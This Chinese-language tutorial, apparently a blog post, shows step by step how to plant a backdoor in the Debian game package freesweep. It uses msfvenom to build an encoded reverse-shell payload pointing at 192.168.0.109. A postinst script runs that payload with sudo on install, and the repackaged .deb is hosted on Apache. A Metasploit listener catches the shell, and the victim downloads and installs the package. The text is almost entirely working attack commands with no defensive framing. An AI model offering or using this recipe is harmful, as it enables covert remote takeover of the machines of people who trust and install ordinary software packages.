目录
1.下载软件包
kali安装软件包
apt install 软件名称
kali下载软件包
apt --download-only install 软件名称
如图,下载软件包
apt --download-only install freesweep
编辑
2.解压软件包
小知识1:kali更新或安装包的目录
kali系统更新或安装的包目录:/var/cache/apt/archives/
编辑
我们去查找刚刚下载的包,使用ls | grep free
编辑
将这个包移动到跟目录下,便于后面的操作 mv ./freesweep_1.0.2-1_amd64.deb ~/
编辑
编辑
小知识2:kali解压或安装操作
安装:dpkg -i
解压:dpkg -x
我们将软件包解压
dpkg -x freesweep_1.0.2-1_amd64.deb free
编辑
切换到free目录,查看文件列表
编辑
3.生成恶意代码到软件包源文件中
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.0.109 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources
扩展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。
4.创建软件包信息目录
创建软件包目录
mkdir free/DEBIAN
切换目录
cd free/DEBIAN
编辑
vim /root/free/DEBIAN/control
Package:freesweep Version:1.0.1-1 Section:Games and Amusement Priority:optional Architecture:amd64 Maintainer:Ubuntu MOTU Developers(ubuntu-motu@lists.ubuntu.com) Description:a text-based minesweeper Freesweep is an implementation of the popular minesweeper game,where one tries to find all the mines without igniting any,based on hints given by the computer.Unlike most implementations of this game,Freesweep works in any visual text display - in Linux console,in an xterm,and in most text-based terminals currently in use.
编辑
创建deb软件包,安装后脚本文件,来加载后门
tee /root/free/DEBIAN/postinst << 'EOF' #!/bin/bash sudo chmod 755 /usr/games/freesweep_sources sudo /usr/games/freesweep_sources & EOF
编辑
给postinst加执行权限
chmod 755 /root/free/DEBIAN/postinst
编辑
5.重新生成一个软件包
dpkg-deb --build /root/free/
6 将deb提供下载
systemctl start apache2 systemctl status apache2
将free.deb复制到apache2 根目录
cp free.deb /var/www/html/
7 启动msfconsole
8.配置监听
msf5 \> use exploit/multi/handler
加载payload
msf5 exploit(multi/handler) \> set payload linux/x64/meterpreter/reverse_tcp
设置监听主机
msf5 exploit(multi/handler) \> set lhost 192.168.31.53
查看需要配置的参数
msf5 exploit(multi/handler) \> show options
run
10 目标机下载并安装带木马的deb软件
wget http://192.168.0.109/free.deb
11.目标机安装软件
dpkg -i free.deb